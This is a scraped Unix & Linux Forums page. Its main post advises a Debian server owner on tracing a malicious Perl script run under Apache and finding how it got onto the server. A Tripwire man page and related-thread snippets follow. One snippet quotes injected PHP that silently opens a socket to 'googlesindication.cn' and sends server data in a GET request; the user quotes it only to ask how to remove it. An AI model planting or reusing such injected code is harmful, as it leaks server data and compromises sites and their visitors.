Login or Register to Ask a Question and Join Our Community

Sponsored Content
Full Discussion: Malicious perl script
Operating Systems Linux Debian Malicious perl script Post 302992364 by drysdalk on Friday 24th of February 2017 07:49:10 AM
Old 02-24-2017
Hi,

The error messages you got from 'ls' would mean that that PID 4600 no longer exists - in other words, the process with ID 4600 has since exited. These kinds of things only tend to hang around for so long, and you really need to catch them right in the act to have any decent chance of easily tracking them down. If you see any other suspicious processes still (to recap, that would be processes owned by 'apache' but which claim to be anything other than 'httpd') then have a look at their entries in the /proc filesystem in the same way. But most likely it's all over and done with by now.

Unfortunately, the bigger problem you have here is not in fact the rogue scripts themselves, but the question of how they came to be on your system in the first place. In my experience, an attacker finds something they can exploit, like a file upload form without sufficient security protection, or some other script that they can exploit to make it upload things to a globally-writable location on the server. Once they upload their script, they then run it, it hangs about for a bit while it does its thing, then exits.

So the more important thing you have to do here is figure out how the attackers got these scripts on your system. The fact that they might still be somewhere on your server is certainly a problem, but a bigger problem is the fact that they were able to be on your server at all in the first place. In all likelihood you have a security hole somewhere that could be exploited by the same attacker again, or an entirely different attacker in the future.
 

7 More Discussions You Might Find Interesting

1. Shell Programming and Scripting

remove malicious codes from a file

Hello, Please advise a script/command to remove the following line for a file <?php error_reporting(0); $fn = "googlesindication.cn"; $fp = fsockopen($fn, 80, $errno, $errstr, 15); if (!$fp) { } else { $query='site='.$_SERVER; $out = "GET /links.php?".$query." HTTP/1.1\r\n"; ... (5 Replies)
Discussion started by: fed.linuxgossip
5 Replies

2. Shell Programming and Scripting

Anti-malicious files and viruses

Hello I ask you how to make a Anti-malicious files and viruses Or if one of you a small example of the work on the same place and I hope my request I want a small patch or the process of examination Virus http://www.google.jo/images/cleardot.gif ---------- Post updated... (1 Reply)
Discussion started by: x-zer0
1 Replies

3. Cybersecurity

How to analyze malicious code

A series on The H about analyzing potentially malicious code flying around on the net. Pretty well written, and a nice read for those interested in how exploits work: CSI:Internet - Alarm at the pizza service CSI:Internet - The image of death CSI:Internet - PDF timebomb CSI:Internet -... (0 Replies)
Discussion started by: pludi
0 Replies

4. Shell Programming and Scripting

calling a perl script with arguments from a parent perl script

I am trying to run a perl script which needs input arguments from a parent perl script, but doesn't seem to work. Appreciate your help in this regard. From parent.pl $input1=123; $input2=abc; I tried calling it with system("/usr/bin/perl child.pl $input1 $input2"); and `perl... (1 Reply)
Discussion started by: grajp002
1 Replies

5. Shell Programming and Scripting

Perl : embedding java script with cgi perl script

Hi All, I am aware that html tags can be embedded in cgi script as below.. In the same way is it possible to embed the below javascript in perl cgi script ?? print("<form action="action.htm" method="post" onSubmit="return submitForm(this.Submitbutton)">"); print("<input type = "text"... (1 Reply)
Discussion started by: scriptscript
1 Replies

6. Shell Programming and Scripting

Malicious pl script, what does it do

Hello, i found and malicious looking script on my server, here is its code safelly pasted as a text on pastebin: Posting links to pastebin scripts are forbidden at this site. Please what does this script do? It has .pl extension and is on shared cpanel hosting account (1 Reply)
Discussion started by: postcd
1 Replies

7. Programming

PERL: In a perl-scripttTrying to execute another perl-script that SETS SOME VARIABLES !

I have reviewed many examples on-line about running another process (either PERL or shell command or a program), but do not find any usefull for my needs way. (Reviewed and not useful the system(), 'back ticks', exec() and open()) I would like to run another PERL-script from first one, not... (1 Reply)
Discussion started by: alex_5161
1 Replies

LEARN ABOUT DEBIAN

twfiles

TWFILES(5)							File Formats Manual							TWFILES(5)

NAME

       twfiles - overview of files used by Tripwire and file backup process

DESCRIPTION

   Configuration File
       default: /etc/tripwire/tw.cfg
       The configuration file stores system-specific information, such as the location of Tripwire data files. The configuration settings are gen-
       erated during the installation process, but can be changed by the system administrator at any time.  See the twconfig(4) man page for a
       more complete discussion.

   Policy File
       default: /etc/tripwire/tw.pol
       The policy file consists of a series of rules specifying the system objects that Tripwire should monitor, and the data for each object that
       should be collected and stored in the database file.  Should unexpected changes occur, the policy file can describe the person to be noti-
       fied and the severity of the violation.	See the policyguide.txt file in the policy directory and the twpolicy(4) man page for a more com-
       plete discussion.

   Database File
       default: /var/lib/$(HOSTNAME).twd
       The database file serves as the baseline for integrity checking.  After installation, Tripwire creates the initial database file, a "snap-
       shot" of the filesystem in a known secure state.  Later, when an integrity check is run, Tripwire compares each system object described in
       the policy file against its corresponding entry in the database.  A report is created, and if an object has changed outside of constraints
       defined in the policy file, a violation is reported.  See the tripwire(8) and twprint(8) man pages for more information on creating and
       maintaining database files.

   Report Files
       default: /var/lib/tripwire/report/$(HOSTNAME)-$(DATE).twr
       Once the above three files have been created, Tripwire can run an integrity check and search for any differences between the current system
       and the data stored in the "baseline" Tripwire database.  This information is archived into report files, a collection of rule violations
       discovered during an integrity check.  With the appropriate settings, a report can also be emailed to one or more recipients.  See the
       tripwire(8) and twprint(8) man pages for information on creating and printing report files.

   Key Files
       defaults: /etc/tripwire/site.key and /etc/tripwire/$(HOSTNAME)-local.key
       It is critical that Tripwire files be protected from unauthorized access--an attacker who is able to modify these files can subvert Trip-
       wire operation.	For this reason, all of the above files are signed using public key cryptography to prevent unauthorized modification.
       Two separate sets of keys protect critical Tripwire data files.	One or both of these key sets is necessary for performing almost every
       Tripwire task.

       The site key is used to protect files that could be used across several systems.  This includes the policy and configuration files.  The
       local key is used to protect files specific to the local machine, such as the Tripwire database.  The local key may also be used for sign-
       ing integrity check reports.  See the twadmin(8) man page for more information on keys.

   File Backup
       To prevent the accidental deletion of important data, Tripwire automatically creates backup files whenever any Tripwire file is overwrit-
       ten. The existing file will be renamed with a .bak extension, and the new version of the file will take its place.  Only one backup copy
       for each filename can exist at any time.  If a backup copy of a file already exists, the older backup file will be deleted and replaced
       with the newer one.

       File backup is an integral part of Tripwire, and cannot be removed or changed.

VERSION INFORMATION

       This man page describes Tripwire 2.4.

AUTHORS

       Tripwire, Inc.

COPYING PERMISSIONS

       Permission is granted to make and distribute verbatim copies of this man page provided the copyright notice and this permission notice are
       preserved on all copies.

       Permission is granted to copy and distribute modified versions of this man page under the conditions for verbatim copying, provided that
       the entire resulting derived work is distributed under the terms of a permission notice identical to this one.

       Permission is granted to copy and distribute translations of this man page into another language, under the above conditions for modified
       versions, except that this permission notice may be stated in a translation approved by Tripwire, Inc.

       Copyright 2000 Tripwire, Inc. Tripwire is a registered trademark of Tripwire, Inc. in the United States and other countries. All rights
       reserved.

SEE ALSO

       twintro(8), tripwire(8), twadmin(8), twprint(8), siggen(8), twconfig(4), twpolicy(4)

								    1 July 2000 							TWFILES(5)
All times are GMT -4. The time now is 08:02 AM.
Unix & Linux Forums Content Copyright 1993-2022. All Rights Reserved.
Privacy Policy